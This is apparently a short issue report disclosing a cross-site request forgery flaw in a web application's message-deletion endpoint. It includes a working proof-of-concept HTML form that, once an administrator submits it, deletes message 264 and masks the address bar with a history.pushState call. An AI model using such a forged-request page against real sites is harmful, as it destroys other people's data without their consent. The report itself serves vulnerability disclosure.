There is a CSRF vulnerability that can delete the message

Question

There is a CSRF vulnerability that can delete the message

Opened this issue a year ago · 0 comments

After the administrator open the following page, and click the the Submit request, square message with ID 264 will be deleted.

<html>
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://192.168.146.129:8181/square/DelectSquareById/264">
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>